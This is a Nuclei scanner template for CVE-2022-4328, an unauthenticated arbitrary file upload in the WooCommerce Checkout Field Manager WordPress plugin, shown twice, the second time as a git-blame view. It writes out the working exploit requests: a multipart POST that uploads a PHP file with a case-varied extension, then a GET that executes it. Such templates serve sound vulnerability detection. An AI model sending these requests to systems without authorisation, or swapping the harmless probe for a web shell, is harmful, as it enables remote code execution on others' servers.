nuclei-templates/http/cves/2022/CVE-2022-4328.yaml

id: CVE-2022-4328

info:
  name: WooCommerce Checkout Field Manager < 18.0 - Arbitrary File Upload
  author: theamanrawat
  severity: critical
  description: |
    The WooCommerce Checkout Field Manager WordPress plugin before 18.0 does not validate files to be uploaded, which could allow unauthenticated attackers to upload arbitrary files such as PHP on the server.
  remediation: Fixed in version 18.0
  reference:
    - https://wpscan.com/vulnerability/4dc72cd2-81d7-4a66-86bd-c9cfaf690eed
    - https://wordpress.org/plugins/n-media-woocommerce-checkout-fields/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-4328
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-4328
    cwe-id: CWE-434
    epss-score: 0.59729
    epss-percentile: 0.97436
    cpe: cpe:2.3:a:najeebmedia:woocommerce_checkout_field_manager:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: najeebmedia
    product: woocommerce_checkout_field_manager
    framework: wordpress
  tags: wp,n-media-woocommerce-checkout-fields,wpscan,cve,cve2022,rce,wordpress,wp-plugin,intrusive

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php?action=cfom_upload_file&name={{randstr}}.pHp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=------------------------22728be7b3104597

        --------------------------22728be7b3104597
        Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
        Content-Type: application/octet-stream

        <?php echo md5("CVE-2022-4328"); ?>

        --------------------------22728be7b3104597--
      - |
        GET /wp-content/uploads/cfom_files/{{to_lower('{{randstr}}')}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - fe5df26ce4ca0056ffae8854469c282f

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100deebab23290199ba45f48fe467844ac5767ccb192ab136d6911555b094bd95ea0221009dc0d5951b27236f3439b04633ee33640eaa78cb4aaa9ddbc3d3d28460c764db:922c64590222798bb761d5b6d8e72950
templates added 2023-05-06 12:12:20 +00:00			`id: CVE-2022-4328`

			`info:`
			`name: WooCommerce Checkout Field Manager < 18.0 - Arbitrary File Upload`
			`author: theamanrawat`
			`severity: critical`
			`description: \|`
			`The WooCommerce Checkout Field Manager WordPress plugin before 18.0 does not validate files to be uploaded, which could allow unauthenticated attackers to upload arbitrary files such as PHP on the server.`
updated 2022 CVEs 2023-09-06 11:59:08 +00:00			`remediation: Fixed in version 18.0`
templates added 2023-05-06 12:12:20 +00:00			`reference:`
			`- https://wpscan.com/vulnerability/4dc72cd2-81d7-4a66-86bd-c9cfaf690eed`
			`- https://wordpress.org/plugins/n-media-woocommerce-checkout-fields/`
			`- https://nvd.nist.gov/vuln/detail/CVE-2022-4328`
			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.8`
			`cve-id: CVE-2022-4328`
			`cwe-id: CWE-434`
TemplateMan Update [Thu Nov 9 06:04:51 UTC 2023] :robot: 2023-11-09 06:04:52 +00:00			`epss-score: 0.59729`
TemplateMan Update [Fri Nov 10 17:07:51 UTC 2023] :robot: 2023-11-10 17:07:52 +00:00			`epss-percentile: 0.97436`
updated 2022 CVEs 2023-09-06 11:59:08 +00:00			`cpe: cpe:2.3:a:najeebmedia:woocommerce_checkout_field_manager::::::wordpress::*`
templates added 2023-05-06 12:12:20 +00:00			`metadata:`
boolean format update 2023-06-04 08:13:42 +00:00			`verified: true`
updated 2022 CVEs 2023-09-06 11:59:08 +00:00			`max-request: 2`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: najeebmedia`
			`product: woocommerce_checkout_field_manager`
updated 2022 CVEs 2023-09-06 11:59:08 +00:00			`framework: wordpress`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`tags: wp,n-media-woocommerce-checkout-fields,wpscan,cve,cve2022,rce,wordpress,wp-plugin,intrusive`
templates added 2023-05-06 12:12:20 +00:00
			`http:`
			`- raw:`
			`- \|`
			`POST /wp-admin/admin-ajax.php?action=cfom_upload_file&name={{randstr}}.pHp HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: multipart/form-data; boundary=------------------------22728be7b3104597`

			`--------------------------22728be7b3104597`
			`Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"`
			`Content-Type: application/octet-stream`

			`<?php echo md5("CVE-2022-4328"); ?>`

			`--------------------------22728be7b3104597--`
			`- \|`
			`GET /wp-content/uploads/cfom_files/{{to_lower('{{randstr}}')}}.php HTTP/1.1`
			`Host: {{Hostname}}`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`- fe5df26ce4ca0056ffae8854469c282f`
templates added 2023-05-06 12:12:20 +00:00
			`- type: word`
			`part: header`
			`words:`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`- text/html`
templates added 2023-05-06 12:12:20 +00:00
			`- type: status`
			`status:`
			`- 200`
Auto Template Signing [Sat Nov 11 17:38:54 UTC 2023] :robot: 2023-11-11 17:38:55 +00:00			`# digest: 4b0a00483046022100deebab23290199ba45f48fe467844ac5767ccb192ab136d6911555b094bd95ea0221009dc0d5951b27236f3439b04633ee33640eaa78cb4aaa9ddbc3d3d28460c764db:922c64590222798bb761d5b6d8e72950`